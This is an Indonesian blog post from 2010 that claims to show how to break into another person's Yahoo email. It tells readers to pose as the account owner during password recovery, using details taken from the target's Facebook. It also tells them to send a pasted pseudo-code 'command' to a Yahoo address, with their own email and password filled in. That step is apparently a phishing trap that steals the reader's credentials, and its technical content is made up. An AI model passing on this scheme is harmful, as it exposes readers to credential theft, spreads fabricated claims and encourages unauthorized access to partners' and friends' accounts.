Rabu, 23 Juni 2010

Cara mendapatkan password email orang dengan bantuan yahoo.

Cara ini didapat secara tidak sengaja ketika saya mencari cara mengembalikan password email yahoo.saya yang di hack orang.

Saya bertanya pada seorang teman di Malaysia,bisakah membantu saya untuk mendapatkan kembali password email saya yang telah diganti orang?Teman saya tersebut menjawab mudah-mudahan bisa dengan bantuan yahoo team.

Begini langkah-langkah yang di berikannya:

Login pada email yahoo anda yang aktif,terus kirim pesan kepada team yahoo minta untuk mengembalikan password email anda yang telah diganti orang.setelah itu yahoo team akan memberikan beberapa pertanyaan kepada anda menyangkut data-data diri anda.karena mesin yahoo harus memastikan dahulu kalau password email yang anda minta tersebut memang milik anda.
Setelah yahoo menilai bahwa anda benar-benar pemilik account tersebut yahoo akan segera memberikan sebuah link kepada anda untuk menganti password.

Nah inilah cara untuk membobol email yahoo orang lain(yang kita inginkan,baik itu pacar,suami/istri,teman atau teman yang banyak chips pokernya) dengan memamfaatkan kelemahan yang ada pada yahoo ini.Dengan berpura-pura email yang akan kita minta password tersebut adalah email kita yang telah dihack oleh orang.Dan untuk menjawab pertanyaan yanga akan diberikan oleh yahoo nantinya kamu harus melihat / mencatat data-data orang yang menjadi target kamu tersebut pada info facebooknya.Jika kamu dapat menjawab pertanyaanyang di berikan yahoo team.kamu akan mendapat link untuk menganti password dari email yang akan kamu hack.

Beginilah contoh email yang anda kirimkan ke Yahoo.

To : baseaccount58@yahoo.com
Cc :
Subject: Password Recovery email target (email yang akan anda mintakan passwordnya)

Pada kolom pesan copy paste saja perintah ini:

cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa=20
script< ip://233.243.2.34/cgi-bin/start? v703&login=3D(disini isi dengan email anda)&f=3D(disini isi dengan password email anda)&f=3D27586&javascript=3DACTIVE&rsa#>
=0A=0A
--0-1637471967-1277054508=:83166
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

--0-1637471967-1277054508=:83166

Setelah itu klik kirim/send.

Sekarang anda tinggal menunggu balasan dari yahoo.dan berhacker rialah kamu.

Pesan saya jangan kamu guna ilmu untuk kejahatan,tetapi gunakanlah untuk kebaikan